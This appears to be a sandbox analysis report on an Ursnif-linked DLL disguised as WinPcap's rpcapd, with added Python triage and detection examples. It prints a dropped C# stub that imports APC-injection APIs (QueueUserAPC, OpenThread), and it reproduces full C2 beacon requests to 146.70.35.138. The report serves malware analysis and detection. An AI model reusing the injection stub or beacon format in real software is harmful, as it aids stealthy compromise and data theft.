                      SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                      SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                      Malicious:false
                      Preview:
                        using System;
                        using System.Runtime.InteropServices;

                        namespace W32
                        {
                            public class yifpgxqqbj
                            {
                                [DllImport("kernel32")]
                                public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);
                                [DllImport("kernel32")]
                                public static extern IntPtr GetCurrentThreadId();
                                [DllImport("kernel32")]
                                public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);
                            }
                        }
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.22267238940763
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftUsX0zxs7+AEszIwkn23ftUs2WH:p37Lvkmb6KRf2sEWZEif2sxH
                      MD5:7261F6CD6A6D4860AC034E27509DC55F
                      SHA1:C1282BE561B76009A43FD5BC192CE9D76AF08272
                      SHA-256:F7F9574C754A9C5B3A633B90174E4FAC3FBB9D5657E79D07D9CAAF0BAA8FE5EA
                      SHA-512:CBB1190E96E9929BD12DEB50F2916777C8B8845630DE251A733A49567E7DD290F27673B0918D30B4C6691A0142EEF8A4802D6123DC8BECE77E5CA943CD609813
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6369801237092227
                      Encrypted:false
                      SSDEEP:24:etGSh8+mUE7R853RY0kCGs+4I4tkZfmPqDZ0WI+ycuZhNPHqakSGHbPNnq:63XE7S505Jm0ZX1ulPqa30Rq
                      MD5:21F3C262E8990FE0E1A44D58B448B899
                      SHA1:2CD298766EC3E59F36C316B35BB0728368117153
                      SHA-256:D594A1A6D450503AB6BDDC352174CC5F680F84CBEEAC0483BB064BA27CB381F0
                      SHA-512:2975E0F079F3D0360854A1249B7A1FBAB7AE5EA851F3A6924302135C03A8DA9E44310CA7E9D82BC672C67755A121B01016B680FE97B060384C3EECF3EE9F9C23
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......]...........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.327904541660146
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRf2SEif2eOKaM5DqBVKVrdFAMBJTH:Akka6C2SEu2eOKxDcVKdBJj
                      MD5:51149F7278FBC7AB67B11D6B7BF38CF0
                      SHA1:15D9E224C099E0795568A20DAFACEEA4BF50D88A
                      SHA-256:6477E4EF8AF1EEA40F7734141A2CA95216DCD1BC01C53397ADBEABD2913543CB
                      SHA-512:DCB5699FB0966FF9D79A08AB874CDC2106FD74133878789C469A2EA31970A4B4FBBA138916763DF2C0EAEC64D45120E5A17D1EB5DA7B2D876098DBB4ACED025C
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
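The four dropped files above are the two halves of a PowerShell Add-Type build: powershell.exe writes a C# source file and a csc.exe argument file into %TEMP%, csc.exe compiles them into a 3.5 KB assembly, and the resulting class hands OpenThread, GetCurrentThreadId and QueueUserAPC, the primitives of APC injection, back to the script. The Python below is an added triage example and is not part of the Joe Sandbox report or of the sample: it takes the dropped .cs text and the csc.exe argument line from this page (with the preview's "." line-break markers restored to newlines) as constructed input, pulls out the P/Invoke declarations, and checks whether the imported set completes a known injection technique. The technique table and the %TEMP%/System.Management.Automation build markers are the example's own heuristics.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the dropped C# stub and csc.exe argument line from this
# report, with the preview's "." line-break markers restored to newlines.
CS_SOURCE = '''using System;
using System.Runtime.InteropServices;

namespace W32
{
    public class yifpgxqqbj
    {
        [DllImport("kernel32")]
        public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);
        [DllImport("kernel32")]
        public static extern IntPtr GetCurrentThreadId();
        [DllImport("kernel32")]
        public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);
    }
}
'''

CSC_CMDLINE = (
    '/t:library /utf8output /R:"System.dll" '
    '/R:"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\'
    'v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" /R:"System.Core.dll" '
    '/out:"C:\\Users\\user\\AppData\\Local\\Temp\\poet0yxq\\poet0yxq.dll" '
    '/debug- /optimize+ /warnaserror /optimize+ '
    '"C:\\Users\\user\\AppData\\Local\\Temp\\poet0yxq\\poet0yxq.0.cs"'
)

# API sets that, imported together by a script-compiled stub, implement one injection
# technique (example heuristic table, not from the report).
INJECTION_SETS = {
    "APC injection (QueueUserAPC)": {"QueueUserAPC", "OpenThread"},
    "Remote thread injection": {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "Local shellcode execution": {"VirtualAlloc", "CreateThread"},
}

# [DllImport("dll")] ... public static extern <ret> <Name>(
PINVOKE_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"[^\]]*\]\s*'
    r'public\s+static\s+extern\s+\S+\s+(?P<name>\w+)\s*\('
)


@dataclass
class PInvoke:
    dll: str
    name: str


def extract_pinvokes(source):
    """Every P/Invoke declaration in the C# text, in source order."""
    return [PInvoke(m.group("dll").lower(), m.group("name"))
            for m in PINVOKE_RE.finditer(source)]


def parse_csc_cmdline(cmdline):
    """Output path, referenced assemblies and source files from a csc.exe argument line."""
    out = re.search(r'/out:"([^"]+)"', cmdline)
    refs = re.findall(r'/R:"([^"]+)"', cmdline)
    sources = re.findall(r'"([^"]+\.cs)"', cmdline)
    return {
        "out": out.group(1) if out else None,
        # Add-Type always references System.Management.Automation.dll.
        "from_powershell": any(r.lower().endswith("system.management.automation.dll") for r in refs),
        "temp_build": any("\\appdata\\local\\temp\\" in s.lower() for s in sources),
        "sources": sources,
    }


def classify(pinvokes):
    """Names of the techniques whose full API set is present."""
    names = {p.name for p in pinvokes}
    return [tech for tech, needed in INJECTION_SETS.items() if needed <= names]


def triage(source, cmdline):
    build = parse_csc_cmdline(cmdline)
    pinvokes = extract_pinvokes(source)
    techniques = classify(pinvokes)
    # Verdict: a PowerShell-driven build in %TEMP% whose imports complete an injection set.
    suspicious = build["from_powershell"] and build["temp_build"] and bool(techniques)
    return {"build": build, "pinvokes": [(p.dll, p.name) for p in pinvokes],
            "techniques": techniques, "suspicious": suspicious}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(CS_SOURCE, CSC_CMDLINE), indent=2))
```

The same two inputs are what an EDR sees on the endpoint (the .cs file write and the csc.exe command line are both in the process tree), so the check runs equally well on telemetry as on sandbox output.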
                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.112861669562404
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:VoevdOQpeU.dll
                      File size:640699
                      MD5:ba155d8aed7ca303fcfc3f0248d218e1
                      SHA1:600453c21cdbecdbea9c825df4754b8a1829d649
                      SHA256:a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
                      SHA512:5b58791e43d9fef57d3233ab015ea0609901ab5d7cc70b6a4d0291ea38e0082af06ba9a8996b6ac822d00f9dc3bf014bb5aabeebd5bf480f92e23372e0850582
                      SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZB:+w1lEKOpuYxiwkkgjAN8ZB
                      TLSH:12D4BD1A029B2102EBB6CE78A751636C54574CE09B01E2CFC9190DA395E34FBF4FA5ED
                      File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................
                      Icon Hash:74f0e4ecccdce0e4
                      Entrypoint:0x401023
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:fd1c62e6f93e304a27347077f6d2b44c
                      Signature Valid:
                      Signature Issuer:
                      Signature Validation Error:
                      Error Number:
                      Not Before, Not After
                        Subject Chain
                          Version:
                          Thumbprint MD5:
                          Thumbprint SHA-1:
                          Thumbprint SHA-256:
                          Serial:
                          Instruction
                          jmp 00007F89EC4AA38Dh
                          jmp 00007F89EC4DAAF8h
                          jmp 00007F89EC4AA073h
                          jmp 00007F89EC4A9D2Eh
                          jmp 00007F89EC4AA149h
                          jmp 00007F89EC4A9B84h
                          jmp 00007F89EC4DFF6Fh
                          jmp 00007F89EC4A9C8Ah
                          jmp 00007F89EC4D32E5h
                          jmp 00007F89EC4E31A0h
                          jmp 00007F89EC4DEE0Bh
                          jmp 00007F89EC4E4366h
                          jmp 00007F89EC4A9C01h
                          jmp 00007F89EC4D441Ch
                          jmp 00007F89EC4E6A37h
                          jmp 00007F89EC4DDCE2h
                          jmp 00007F89EC4D549Dh
                          jmp 00007F89EC4AA0B8h
                          jmp 00007F89EC4E99D3h
                          jmp 00007F89EC4A9DDEh
                          jmp 00007F89EC4E5599h
                          jmp 00007F89EC4DBBC4h
                          jmp 00007F89EC4D64AFh
                          jmp 00007F89EC4E53BAh
                          jmp 00007F89EC4AA055h
                          jmp 00007F89EC4E0F90h
                          jmp 00007F89EC4D89EBh
                          jmp 00007F89EC4E8AF6h
                          jmp 00007F89EC4D78B1h
                          jmp 00007F89EC4AA04Ch
                          jmp 00007F89EC4A9BC7h
                          jmp 00007F89EC4E20D2h
                          jmp 00007F89EC4E7A4Dh
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          Programming Language:
                          • [ C ] VS2013 build 21005
                          • [RES] VS2015 build 23026
                          • [LNK] VS2013 UPD4 build 31101
                          • [C++] VS2010 SP1 build 40219
                          • [IMP] VS2012 UPD2 build 60315
                          • [RES] VS2008 build 21022
                          • [EXP] VS2015 UPD3.1 build 24215
                          • [ C ] VS2012 UPD1 build 51106
                          • [C++] VS2015 UPD3.1 build 24215
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country
                          RT_VERSION | 0x98170 | 0x3d0 | data | |
                          DLL | Import
                          WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                          msvcrt.dll | toupper
                          USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                          OLEAUT32.dll | LHashValOfNameSysA
                          SHELL32.dll | FindExecutableW
                          KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                          Secur32.dll | InitializeSecurityContextW
                          ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
                          GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW
                          Description | Data
                          LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                          InternalName | rpcapd
                          FileVersion | 4.0.0.1040
                          CompanyName | CACE Technologies
                          LegalTrademarks |
                          ProductName | WinPcap
                          ProductVersion | 4.0.0.1040
                          FileDescription | Remote Packet Capture Daemon
                          Build Description |
                          OriginalFilename | rpcapd.exe
                          Translation | 0x0000 0x04b0
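The static header block above is worth reading with some care: the report says "Digitally signed: true" next to empty Signature Valid/Issuer fields, the security directory entry is (0x1000, size 0x1) and lands inside .text, .rdata sits at 7.16 bits per byte with a ZLIB complexity of 0.81, and the link timestamp (August 2003) predates the VS2013/VS2015 toolchains listed under Programming Language. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it constructs a small hypothetical PE32 that reproduces those three properties (a one-byte certificate table pointing into .text, a uniform-byte data section, a 2003 timestamp on a linker-14 image) and runs the checks an analyst can apply to avoid reading a nonzero certificate-table entry as a signature. The PE builder, its section contents, the 7.0-bit entropy threshold and the linker-version release-year table are the example's own.

```python
import math
import struct
from datetime import datetime, timezone

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
IMAGE_SCN_MEM_EXECUTE = 0x20000000
# First release year of each MSVC linker major version (10=VS2010, 11=VS2012, 12=VS2013, 14=VS2015).
LINKER_RELEASE_YEAR = {10: 2010, 11: 2012, 12: 2013, 14: 2015}


def build_pe(sections, security_dir, timestamp=0x3F4B4692, linker_major=14):
    """Build a minimal PE32 image (hypothetical test input, not the sample) from
    (name, characteristics, raw bytes) triples; security_dir is (file offset, size)."""
    FA, SA = 0x200, 0x1000                       # file / section alignment
    hdr_end = 0x40 + 4 + 20 + 224 + 40 * len(sections)
    size_of_headers = -(-hdr_end // FA) * FA
    raw_ptr, rva, sect_hdrs, body = size_of_headers, SA, b"", b""
    for name, chars, data in sections:
        raw_size = -(-len(data) // FA) * FA
        sect_hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                                 len(data), rva, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        rva += -(-len(data) // SA) * SA
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = security_dir
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, linker_major, 0, 0, 0, 0, SA, SA, 0, 0x400000, SA, FA,
                      5, 0, 0, 0, 5, 0, 0, rva, size_of_headers, 0, 2, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", off, size) for off, size in dirs)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, len(opt), 0x2102)
    return (dos + b"PE\0\0" + coff + opt + sect_hdrs).ljust(size_of_headers, b"\0") + body


def parse_pe(buf):
    """Read the header fields the checks below need from a PE32 file image."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, coff)
    opt = coff + 20
    if struct.unpack_from("<H", buf, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here")
    ndirs = struct.unpack_from("<I", buf, opt + 92)[0]
    dirs = [struct.unpack_from("<II", buf, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        hdr = struct.unpack_from("<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        name, vsize, va, rsize, rptr, *_, chars = hdr
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_ptr": rptr, "raw_size": rsize, "chars": chars,
                         "data": buf[rptr:rptr + min(rsize, vsize)]})
    return {"timestamp": timestamp, "linker_major": buf[opt + 2], "dirs": dirs,
            "sections": sections}


def entropy(data):
    """Shannon entropy in bits per byte."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c) if n else 0.0


def check_authenticode(pe, file_len):
    """The security directory holds a *file offset* (not an RVA) to a WIN_CERTIFICATE
    blob that starts with an 8-byte header and lives past the last section; any other
    nonzero entry is not a usable signature, whatever a summary field says."""
    off, size = pe["dirs"][IMAGE_DIRECTORY_ENTRY_SECURITY]
    if off == 0 and size == 0:
        return ["unsigned"]
    problems = []
    if size < 8:
        problems.append("size smaller than WIN_CERTIFICATE header")
    if off + size > file_len:
        problems.append("certificate table runs past end of file")
    for s in pe["sections"]:
        if s["raw_ptr"] <= off < s["raw_ptr"] + s["raw_size"]:
            problems.append("certificate table inside section " + s["name"])
    return problems or ["certificate table present; validate the chain separately"]


def flag_sections(pe, threshold=7.0):
    """(name, entropy, flagged): a non-executable section near 8 bits/byte usually
    carries an encrypted or compressed payload rather than plain data."""
    out = []
    for s in pe["sections"]:
        e = round(entropy(s["data"]), 2)
        out.append((s["name"], e, not (s["chars"] & IMAGE_SCN_MEM_EXECUTE) and e > threshold))
    return out


def timestamp_plausible(pe):
    """False when the link timestamp predates the linker version that produced the file."""
    year = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).year
    floor = LINKER_RELEASE_YEAR.get(pe["linker_major"])
    return floor is None or year >= floor


def sample_pe():
    text = b"\x55\x8b\xec\x5d\xc3" * 200   # low-entropy code-like bytes
    rdata = bytes(range(256)) * 16          # every byte value equally often: entropy 8.0
    return build_pe([(".text", 0x60000020, text), (".rdata", 0x40000040, rdata)],
                    security_dir=(0x300, 1))  # one-byte "certificate" inside .text


if __name__ == "__main__":
    buf = sample_pe()
    pe = parse_pe(buf)
    print("authenticode:", check_authenticode(pe, len(buf)))
    print("sections:", flag_sections(pe))
    print("timestamp consistent with linker:", timestamp_plausible(pe))
```

On a real file the same three functions take the bytes read from disk; the PE32+ case only differs in the optional-header layout (data directories start at offset 112 instead of 96), which the parser deliberately refuses rather than misreads.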
                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                          04/23/22-08:12:19.910177 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                          04/23/22-08:12:21.823792 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                          04/23/22-08:11:59.593120 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16
                          04/23/22-08:12:20.776897 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138
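All four alerts are ET rule 2033203, whose name says it keys on the `_2B` token inside a long, slash-broken request path. The Python below is an added example, not part of the Joe Sandbox report or of the Emerging Threats rule: it reimplements that structural check over the two beacon request lines recorded in this report's HTTP session (copied in as constructed sample input, with one benign request for contrast), undoes the `_2B`/`_2F`/`_2D` token encoding to get back a string in the base64 alphabet (the payload stays encrypted and the example does not try to decrypt it), and adds an independent heuristic on the User-Agent, which pairs MSIE 8.0 with Windows NT 10.0, a combination no shipped Internet Explorer produces because IE8's newest supported platform was Windows 7 (NT 6.1). Treating the first path component as a static directory, the token-to-character mapping, and the segment/length thresholds are assumptions of the example.

```python
import re

# Constructed sample input: the two beacon request lines recorded in the HTTP session
# of this report, plus one ordinary request for contrast.
REQUESTS = [
    {"line": "GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/"
             "7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/"
             "M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/"
             "FFd4Km9NmRn/_2FUZ.src HTTP/1.1",
     "headers": {"Host": "146.70.35.138",
                 "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"}},
    {"line": "GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/"
             "B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/"
             "Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/"
             "lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1",
     "headers": {"Host": "146.70.35.138",
                 "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"}},
    {"line": "GET /index.html HTTP/1.1",
     "headers": {"Host": "example.com",
                 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}},
]

# Assumed token mapping: percent-encoding of the base64 specials with '%' replaced by '_'.
TOKENS = {"_2B": "+", "_2F": "/", "_2D": "="}
B64_RE = re.compile(r"[A-Za-z0-9+/=]+")
UA_RE = re.compile(r"MSIE (\d+)\.\d+; Windows NT (\d+)\.(\d+)")
# Highest Windows NT version each legacy IE release could run on; IE11 has no ceiling here.
IE_MAX_NT = {8: (6, 1), 9: (6, 1), 10: (6, 2)}


def recover_blob(path):
    """Join the slash-broken path (first component treated as a static directory, an
    assumption), drop the fake extension and undo the _2X tokens.
    Returns (recovered string, token count, extension) or (None, 0, None)."""
    segments = path.strip("/").split("/")
    if len(segments) < 2:
        return None, 0, None
    body, ext = "".join(segments[1:]), None
    if "." in segments[-1]:
        body, ext = body.rsplit(".", 1)
    tokens = sum(body.count(t) for t in TOKENS)   # count before substitution
    for token, ch in TOKENS.items():
        body = body.replace(token, ch)
    return body, tokens, ext


def is_isfb_beacon(path, min_segments=6, min_tokens=2, min_len=64):
    """Structural match: many segments, short fake extension, _2X tokens, and nothing
    outside the base64 alphabet once the tokens are undone."""
    body, tokens, ext = recover_blob(path)
    if body is None:
        return False
    return (path.count("/") >= min_segments
            and ext is not None and 1 <= len(ext) <= 5 and ext.isalnum()
            and tokens >= min_tokens
            and len(body) >= min_len
            and B64_RE.fullmatch(body) is not None)


def impossible_ua(user_agent):
    """True when the claimed IE version never shipped for the claimed Windows version."""
    m = UA_RE.search(user_agent)
    if not m:
        return False
    ie, nt = int(m.group(1)), (int(m.group(2)), int(m.group(3)))
    return ie in IE_MAX_NT and nt > IE_MAX_NT[ie]


def analyse(request):
    method, path, _ = request["line"].split(" ", 2)
    body, tokens, ext = recover_blob(path)
    beacon = is_isfb_beacon(path)
    ua_bad = impossible_ua(request["headers"].get("User-Agent", ""))
    return {"host": request["headers"].get("Host"), "method": method, "beacon_uri": beacon,
            "impossible_ua": ua_bad, "tokens": tokens, "ext": ext,
            "blob_len": len(body) if body else 0, "verdict": beacon or ua_bad}


if __name__ == "__main__":
    for r in REQUESTS:
        print(analyse(r))
```

The two heuristics are deliberately independent: the URI check survives a User-Agent change, and the UA check still fires if the operator rotates the path layout, so a proxy-log query can use either one on its own.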
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Apr 23, 2022 08:12:19.885525942 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                          Apr 23, 2022 08:12:19.909297943 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                          Apr 23, 2022 08:12:19.909377098 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                          Apr 23, 2022 08:12:19.910176992 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                          Apr 23, 2022 08:12:19.933670998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                          Apr 23, 2022 08:12:20.288152933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
